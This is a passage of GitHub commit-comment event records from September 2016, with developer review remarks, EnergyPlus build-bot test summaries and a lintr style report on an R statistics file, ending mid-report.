{"id":"4591928834","type":"CommitCommentEvent","actor":{"login":"martin-g"},"repo":{"name":"wicketstuff/core"},"payload":{"comment":{"id":19102596,"position":null,"line":null,"path":null,"commit_id":"7572720aac129f034137eabded38c3f2f942c93d","created_at":"2016-09-20T19:31:02Z","updated_at":"2016-09-20T19:31:02Z","body":"OK, I see!\r\nYes, all CIs are very unstable!\r\nOnly BuildBot serves us well! :-)"}},"created_at":"2016-09-20T19:31:02Z"}
{"id":"4591928998","type":"CommitCommentEvent","actor":{"login":"fdkong"},"repo":{"name":"idaholab/moose"},"payload":{"comment":{"id":19102597,"position":17,"line":35,"path":"framework/src/base/ComputeResidualThread.C","commit_id":"d1664146a4a9f03c125ecd0c2356ebebd0389058","created_at":"2016-09-20T19:31:03Z","updated_at":"2016-09-20T19:31:03Z","body":"Possibly, _nl_sys is better because we also have something like _aux_sys."}},"created_at":"2016-09-20T19:31:03Z"}
{"id":"4591929417","type":"CommitCommentEvent","actor":{"login":"Therzok"},"repo":{"name":"NuGet/NuGet.Build.Packaging"},"payload":{"comment":{"id":19102599,"position":null,"line":null,"path":null,"commit_id":"31d07dbe5f95c380a94b8fafa6d47fa0d5320a68","created_at":"2016-09-20T19:31:08Z","updated_at":"2016-09-20T19:31:08Z","body":"![image](https://cloud.githubusercontent.com/assets/109974/18685729/e9192206-7f81-11e6-91cd-a5589ebca177.png)\r\nIf we don't keep it proportional."}},"created_at":"2016-09-20T19:31:08Z"}
{"id":"4591931365","type":"CommitCommentEvent","actor":{"login":"kzu"},"repo":{"name":"NuGet/NuGet.Build.Packaging"},"payload":{"comment":{"id":19102602,"position":null,"line":null,"path":null,"commit_id":"31d07dbe5f95c380a94b8fafa6d47fa0d5320a68","created_at":"2016-09-20T19:31:31Z","updated_at":"2016-09-20T19:31:31Z","body":"WAY better @Therzok "}},"created_at":"2016-09-20T19:31:31Z"}
{"id":"4591933457","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19102608,"position":null,"line":null,"path":null,"commit_id":"a19ddcc005bd09857724e451c8c241b5e1660b8e","created_at":"2016-09-20T19:31:53Z","updated_at":"2016-09-20T19:31:53Z","body":"ASIHP-validation1 (mjwitte) - Win64-Windows-7-VisualStudio-12: OK (2330 of 2338 tests passed, 3 test warnings)\n\n * 11 tests had: AUD diffs.\n * 11 tests had: ERR diffs.\n * 8 tests had: Table big diffs.\n * 1 test had: EIO diffs.\n * 1 test had: ESO small diffs.\n * 1 test had: MDD diffs.\n * 1 test had: MTD diffs.\n * 1 test had: RDD diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a19ddcc005bd09857724e451c8c241b5e1660b8e-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a19ddcc005bd09857724e451c8c241b5e1660b8e-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.66%25-yellow.svg)</a> \n"}},"created_at":"2016-09-20T19:31:53Z"}
{"id":"4591936067","type":"CommitCommentEvent","actor":{"login":"Paebbels"},"repo":{"name":"VHDL/CoreLib"},"payload":{"comment":{"id":19102616,"position":6,"line":33,"path":"src/math.vhdl","commit_id":"10eb07b7dd2e56a8fe88c75df39d57a4cb76c71a","created_at":"2016-09-20T19:32:20Z","updated_at":"2016-09-20T19:32:20Z","body":"All simulators have at least one C interface  (VPI, VHPI, FLI, ...). We can read it this way."}},"created_at":"2016-09-20T19:32:20Z"}
{"id":"4591938342","type":"CommitCommentEvent","actor":{"login":"aymanio"},"repo":{"name":"OgarProject/Ogar"},"payload":{"comment":{"id":19102620,"position":null,"line":null,"path":null,"commit_id":"1ee6f13da6aa79515b719fa5154049ac9a0f4e2f","created_at":"2016-09-20T19:32:41Z","updated_at":"2016-09-20T19:32:41Z","body":"oka"}},"created_at":"2016-09-20T19:32:41Z"}
{"id":"4591938970","type":"CommitCommentEvent","actor":{"login":"StasKolodyuk"},"repo":{"name":"z143/ProjectStas"},"payload":{"comment":{"id":19102621,"position":1,"line":1,"path":"Project1/.gitignore","commit_id":"4a47d0c32c74821b24bafe6b47bf0c933b248ba5","created_at":"2016-09-20T19:32:47Z","updated_at":"2016-09-20T19:32:47Z","body":"В `.gitignore` добавляют обычно\r\n\r\n`*.iml`\r\n`.idea/`\r\n`target/`\r\n\r\nчтобы в репозитории оставались только исходники и никаких скомпилированных классов. Файлы идеи и прочих IDE не добавляются, т.к. у каждого разработчика может  быть своя IDE"}},"created_at":"2016-09-20T19:32:47Z"}
{"id":"4591939584","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19102624,"position":null,"line":null,"path":null,"commit_id":"267558b8d6694e56c6cb103056e24fdb53064fb0","created_at":"2016-09-20T19:32:53Z","updated_at":"2016-09-20T19:32:53Z","body":"ASIHPValidation (shenb) - i386-Windows-7-VisualStudio-12: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-267558b8d6694e56c6cb103056e24fdb53064fb0-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-267558b8d6694e56c6cb103056e24fdb53064fb0-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-20T19:32:53Z"}
{"id":"4591941086","type":"CommitCommentEvent","actor":{"login":"trevordmiller"},"repo":{"name":"trevordmiller/settings"},"payload":{"comment":{"id":19102626,"position":null,"line":null,"path":null,"commit_id":"56a93f5a3177e0a548b7e237c59da137823e898b","created_at":"2016-09-20T19:33:08Z","updated_at":"2016-09-20T19:33:08Z","body":"`git config --global commit.verbose true`"}},"created_at":"2016-09-20T19:33:08Z"}
{"id":"4591941539","type":"CommitCommentEvent","actor":{"login":"kzu"},"repo":{"name":"NuGet/NuGet.Build.Packaging"},"payload":{"comment":{"id":19102629,"position":null,"line":null,"path":null,"commit_id":"31d07dbe5f95c380a94b8fafa6d47fa0d5320a68","created_at":"2016-09-20T19:33:12Z","updated_at":"2016-09-20T19:33:12Z","body":"Should we set up a committee to get everyone's take on the new logo?"}},"created_at":"2016-09-20T19:33:12Z"}
{"id":"4591943054","type":"CommitCommentEvent","actor":{"login":"StasKolodyuk"},"repo":{"name":"z143/ProjectStas"},"payload":{"comment":{"id":19102635,"position":1,"line":1,"path":"Project1/Project1.iml","commit_id":"4a47d0c32c74821b24bafe6b47bf0c933b248ba5","created_at":"2016-09-20T19:33:30Z","updated_at":"2016-09-20T19:33:30Z","body":"Ну т.е. этого файла не должно быть в коммите"}},"created_at":"2016-09-20T19:33:30Z"}
{"id":"4591943799","type":"CommitCommentEvent","actor":{"login":"aske"},"repo":{"name":"salty-horse/ibus-uniemoji"},"payload":{"comment":{"id":19102636,"position":null,"line":null,"path":null,"commit_id":"65ff978f47985c667eef2753a006eb827ea586bc","created_at":"2016-09-20T19:33:38Z","updated_at":"2016-09-20T19:33:38Z","body":"Hello! Is it possible to make a new release with all new changes?\r\nI want to package ibus-uniemoji for NixOS, but it is usually preferred in NixOS to use released versions (arbitarary github rev is usually used when release is broken for a long time; or there ain't any) and customizable vars and python 3 support will help me a lot."}},"created_at":"2016-09-20T19:33:38Z"}
{"id":"4591944547","type":"CommitCommentEvent","actor":{"login":"Piorjade"},"repo":{"name":"Piorjade/cLinux"},"payload":{"comment":{"id":19102639,"position":null,"line":null,"path":null,"commit_id":"fbbcb925f6b703bb6ea7956919c8ce73c83839d2","created_at":"2016-09-20T19:33:47Z","updated_at":"2016-09-20T19:33:47Z","body":"Dayum GitHub bombed everything with MAJOR UPDATE Lol"}},"created_at":"2016-09-20T19:33:47Z"}
{"id":"4591944630","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19102640,"position":null,"line":null,"path":null,"commit_id":"267558b8d6694e56c6cb103056e24fdb53064fb0","created_at":"2016-09-20T19:33:48Z","updated_at":"2016-09-20T19:33:48Z","body":"ASIHPValidation (shenb) - Win64-Windows-7-VisualStudio-12: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-267558b8d6694e56c6cb103056e24fdb53064fb0-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-267558b8d6694e56c6cb103056e24fdb53064fb0-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-20T19:33:48Z"}
{"id":"4591945237","type":"CommitCommentEvent","actor":{"login":"fromAtoZ"},"repo":{"name":"rsatrasala/Google-MoPub-Native-Adapters-iOS"},"payload":{"comment":{"id":19102643,"position":170,"line":284,"path":"Adapter/GADMAdapterMoPub.m","commit_id":"39d0b7ca7f7f8f161f4fedb2242f06947f380374","created_at":"2016-09-20T19:33:55Z","updated_at":"2016-09-20T19:33:55Z","body":"Let's use MPLogDebug for all debug messages."}},"created_at":"2016-09-20T19:33:55Z"}
{"id":"4591946336","type":"CommitCommentEvent","actor":{"login":"kvanrobbroeck"},"repo":{"name":"DavidYML/vdab-spring-mvc-2016"},"payload":{"comment":{"id":19102646,"position":null,"line":null,"path":null,"commit_id":"ebb842bba6bacae39cdb81b58b5f41ced7d90ad1","created_at":"2016-09-20T19:34:08Z","updated_at":"2016-09-20T19:34:08Z","body":"Are you using the file  src/main/resources/moviespic.jpg somewhere?\r\nIf it's a public web asset (such as for use in an <img> element), you should put it somewhere under src/main/resources/static. Otherwise it won't be exposed by Spring Boot's web server."}},"created_at":"2016-09-20T19:34:08Z"}
{"id":"4591951182","type":"CommitCommentEvent","actor":{"login":"stevenschmatz"},"repo":{"name":"mhacks/MHacks-Website"},"payload":{"comment":{"id":19102649,"position":null,"line":null,"path":null,"commit_id":"d3dacdc7a9b571640a490e55747e68cd1df9df82","created_at":"2016-09-20T19:34:53Z","updated_at":"2016-09-20T19:34:53Z","body":"lol dude ur a legend"}},"created_at":"2016-09-20T19:34:53Z"}
{"id":"4591952166","type":"CommitCommentEvent","actor":{"login":"StasKolodyuk"},"repo":{"name":"z143/ProjectStas"},"payload":{"comment":{"id":19102650,"position":1,"line":1,"path":"Project1/logback-test.xml","commit_id":"4a47d0c32c74821b24bafe6b47bf0c933b248ba5","created_at":"2016-09-20T19:35:01Z","updated_at":"2016-09-20T19:35:01Z","body":"Все файлы конфигурации различных библиотек согласно структуре `Maven` проекта должны лежать в папке `resources`."}},"created_at":"2016-09-20T19:35:01Z"}
{"id":"4591957536","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"thijsjanzen/STEPCAM"},"payload":{"comment":{"id":19102658,"position":null,"line":null,"path":null,"commit_id":"50efb5a801656dc2dee7b9cacca9abeabbc80f6f","created_at":"2016-09-20T19:35:46Z","updated_at":"2016-09-20T19:35:46Z","body":"[R/ABC_SMC.R:2:1:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/ABC_SMC.R#L2) *style:* **Variable and function names should be all lowercase.**\n```r\n​getRandomVals <- function(max_val)  {\n^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:15:1:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/ABC_SMC.R#L15) *style:* **Variable and function names should be all lowercase.**\n```r\n​getFromPrevious <- function(inds, ws, disps, filts, comps)  {\n^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:22:1:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/ABC_SMC.R#L22) *style:* **Variable and function names should be all lowercase.**\n```r\n​calculateWeight <- function(params, target, sigma,\n^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:25:68:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/ABC_SMC.R#L25) *style:* **Commas should always have a space after.**\n```r\n​  diff <- params[target] - cbind(disp_vals, filt_vals, comp_vals)[,target]\n                                                                   ^\n```\n[R/ABC_SMC.R:26:54:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/ABC_SMC.R#L26) *style:* **Trailing whitespace is superfluous.**\n```r\n​  vals <- weights * dnorm(diff, mean = 0, sd = sigma)  \n                                                     ^~\n```\n[R/ABC_SMC.R:27:12:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/ABC_SMC.R#L27) *style:* **Put spaces around all infix operators.**\n```r\n​  return( 1/sum(vals) )\n          ~^~\n```\n[R/ABC_SMC.R:31:1:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/ABC_SMC.R#L31) *style:* **Variable and function names should be all lowercase.**\n```r\n​normalizeWeights <- function(x) {\n^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:65:1:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/ABC_SMC.R#L65) *style:* **Variable and function names should be all lowercase.**\n```r\n​calculateDistance <- function(rich, even, div, opt_diff, obs, sd_vals)  {\n^~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:69:40:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/ABC_SMC.R#L69) *style:* **Put spaces around all infix operators.**\n```r\n​  fit_optima <- (opt_diff / sd_vals[4])^2;\n                                      ~^~\n```\n[R/ABC_SMC.R:77:21:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/ABC_SMC.R#L77) *style:* **Variable and function names should be all lowercase.**\n```r\n​ABC_SMC <- function(numParticles, species_fallout, taxa, esppres, n_traits,\n                    ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:79:1:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/ABC_SMC.R#L79) *style:* **lines should not be more than 80 characters.**\n```r\n​                    abundances, frequencies, stopRate, Ord, continue_from_file = TRUE,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:79:46:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/ABC_SMC.R#L79) *style:* **Variable and function names should be all lowercase.**\n```r\n​                    abundances, frequencies, stopRate, Ord, continue_from_file = TRUE,\n                                             ^~~~~~~~\n```\n[R/ABC_SMC.R:82:6:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/ABC_SMC.R#L82) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  for(i in seq_along(sd_vals)) {\n     ^\n```\n[R/ABC_SMC.R:83:7:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/ABC_SMC.R#L83) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if(sd_vals[[i]] == 0.000) {\n      ^\n```\n[R/ABC_SMC.R:85:1:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/ABC_SMC.R#L85) *style:* **lines should not be more than 80 characters.**\n```r\n​           \"one of the community summary statistics shows no variation in your dataset\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:88:10:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/ABC_SMC.R#L88) *style:* **Variable and function names should be all lowercase.**\n```r\n​  res <- detMnbsp(Ord, abundances)\n         ^~~~~~~~\n```\n[R/ABC_SMC.R:88:10:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/ABC_SMC.R#L88) *warning:* **no visible global function definition for ‘detMnbsp’**\n```r\n​  res <- detMnbsp(Ord, abundances)\n         ^~~~~~~~\n```\n[R/ABC_SMC.R:91:18:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/ABC_SMC.R#L91) *style:* **Variable and function names should be all lowercase.**\n```r\n​  disp_vals <- 1:numParticles\n                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:92:18:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/ABC_SMC.R#L92) *style:* **Variable and function names should be all lowercase.**\n```r\n​  filt_vals <- 1:numParticles\n                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:93:18:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/ABC_SMC.R#L93) *style:* **Variable and function names should be all lowercase.**\n```r\n​  comp_vals <- 1:numParticles\n                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:95:13:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/ABC_SMC.R#L95) *style:* **Variable and function names should be all lowercase.**\n```r\n​  fits <- 1:numParticles\n            ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:96:17:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/ABC_SMC.R#L96) *style:* **Variable and function names should be all lowercase.**\n```r\n​  rich_vec <- 1:numParticles\n                ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:97:16:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/ABC_SMC.R#L97) *style:* **Variable and function names should be all lowercase.**\n```r\n​  eve_vec <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:98:16:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/ABC_SMC.R#L98) *style:* **Variable and function names should be all lowercase.**\n```r\n​  div_vec <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:99:16:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/ABC_SMC.R#L99) *style:* **Variable and function names should be all lowercase.**\n```r\n​  opt_vec <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:105:21:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/ABC_SMC.R#L105) *style:* **Variable and function names should be all lowercase.**\n```r\n​  weights <- rep(1, numParticles)\n                    ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:106:26:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/ABC_SMC.R#L106) *style:* **Variable and function names should be all lowercase.**\n```r\n​  next_weights <- rep(1, numParticles)\n                         ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:107:16:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/ABC_SMC.R#L107) *style:* **Variable and function names should be all lowercase.**\n```r\n​  indices <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:114:1:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/ABC_SMC.R#L114) *style:* **lines should not be more than 80 characters.**\n```r\n​    cat(\"Found previous output, continuing from that output\\n\"); flush.console();\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:118:7:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/ABC_SMC.R#L118) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if(d[numParticles,1] == numParticles) {\n      ^\n```\n[R/ABC_SMC.R:118:10:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/ABC_SMC.R#L118) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if(d[numParticles,1] == numParticles) {\n         ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:118:23:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/ABC_SMC.R#L118) *style:* **Commas should always have a space after.**\n```r\n​    if(d[numParticles,1] == numParticles) {\n                      ^\n```\n[R/ABC_SMC.R:118:29:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/ABC_SMC.R#L118) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if(d[numParticles,1] == numParticles) {\n                            ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:139:5:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/ABC_SMC.R#L139) *style:* **Variable and function names should be all lowercase.**\n```r\n​    numberAccepted <- 0\n    ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:140:28:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/ABC_SMC.R#L140) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if (t != 1) weights <- normalizeWeights(weights)\n                           ^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:140:28:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/ABC_SMC.R#L140) *warning:* **no visible global function definition for ‘normalizeWeights’**\n```r\n​    if (t != 1) weights <- normalizeWeights(weights)\n                           ^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:148:12:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/ABC_SMC.R#L148) *style:* **Variable and function names should be all lowercase.**\n```r\n​    while (numberAccepted <= numParticles) {\n           ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:148:30:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/ABC_SMC.R#L148) *style:* **Variable and function names should be all lowercase.**\n```r\n​    while (numberAccepted <= numParticles) {\n                             ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:152:19:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/ABC_SMC.R#L152) *style:* **Variable and function names should be all lowercase.**\n```r\n​        params <- getRandomVals(species_fallout)\n                  ^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:152:19:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/ABC_SMC.R#L152) *warning:* **no visible global function definition for ‘getRandomVals’**\n```r\n​        params <- getRandomVals(species_fallout)\n                  ^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:154:19:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/ABC_SMC.R#L154) *style:* **Variable and function names should be all lowercase.**\n```r\n​        params <- getFromPrevious(indices, weights,\n                  ^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:156:19:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/ABC_SMC.R#L156) *warning:* **no visible global function definition for ‘perturb’**\n```r\n​        params <- perturb(params, sigma)\n                  ^~~~~~~\n```\n[R/ABC_SMC.R:166:1:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/ABC_SMC.R#L166) *style:* **Trailing whitespace is superfluous.**\n```r\n​     \n^~~~~\n```\n[R/ABC_SMC.R:170:40:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/ABC_SMC.R#L170) *style:* **Commas should always have a space after.**\n```r\n​      traits <- as.data.frame(species[,c(2:(n_traits+1))],row.names=c(1:taxa));\n                                       ^\n```\n[R/ABC_SMC.R:170:53:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/ABC_SMC.R#L170) *style:* **Put spaces around all infix operators.**\n```r\n​      traits <- as.data.frame(species[,c(2:(n_traits+1))],row.names=c(1:taxa));\n                                                   ~^~\n```\n[R/ABC_SMC.R:170:59:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/ABC_SMC.R#L170) *style:* **Commas should always have a space after.**\n```r\n​      traits <- as.data.frame(species[,c(2:(n_traits+1))],row.names=c(1:taxa));\n                                                          ^\n```\n[R/ABC_SMC.R:170:68:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/ABC_SMC.R#L170) *style:* **Put spaces around all infix operators.**\n```r\n​      traits <- as.data.frame(species[,c(2:(n_traits+1))],row.names=c(1:taxa));\n                                                                  ~^~\n```\n[R/ABC_SMC.R:173:1:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/ABC_SMC.R#L173) *style:* **Trailing whitespace is superfluous.**\n```r\n​      \n^~~~~~\n```\n[R/ABC_SMC.R:174:8:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/ABC_SMC.R#L174) *style:* **Commented code should be removed.**\n```r\n​     # source(\"/Users/janzen/GitHub/STEPCAM/R/modified_dbFD.R\")\n       ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:175:1:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/ABC_SMC.R#L175) *style:* **lines should not be more than 80 characters.**\n```r\n​      FD_output <- strippedDbFd(Ord, communities, m = res[[1]], nb.sp = res[[2]]) \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:175:20:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/ABC_SMC.R#L175) *style:* **Variable and function names should be all lowercase.**\n```r\n​      FD_output <- strippedDbFd(Ord, communities, m = res[[1]], nb.sp = res[[2]]) \n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:175:20:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/ABC_SMC.R#L175) *warning:* **no visible global function definition for ‘strippedDbFd’**\n```r\n​      FD_output <- strippedDbFd(Ord, communities, m = res[[1]], nb.sp = res[[2]]) \n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:175:82:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/ABC_SMC.R#L175) *style:* **Trailing whitespace is superfluous.**\n```r\n​      FD_output <- strippedDbFd(Ord, communities, m = res[[1]], nb.sp = res[[2]]) \n                                                                                 ^\n```\n[R/ABC_SMC.R:176:1:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/ABC_SMC.R#L176) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/ABC_SMC.R:177:1:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/ABC_SMC.R#L177) *style:* **lines should not be more than 80 characters.**\n```r\n​      FRic <- FD_output$FRic # FRic = functional richness (Villeger et al, 2008, Ecology)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:178:1:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/ABC_SMC.R#L178) *style:* **lines should not be more than 80 characters.**\n```r\n​      FEve <- FD_output$FEve # FEve = functional evenness (Villeger et al, 2008, Ecology)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:179:1:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/ABC_SMC.R#L179) *style:* **lines should not be more than 80 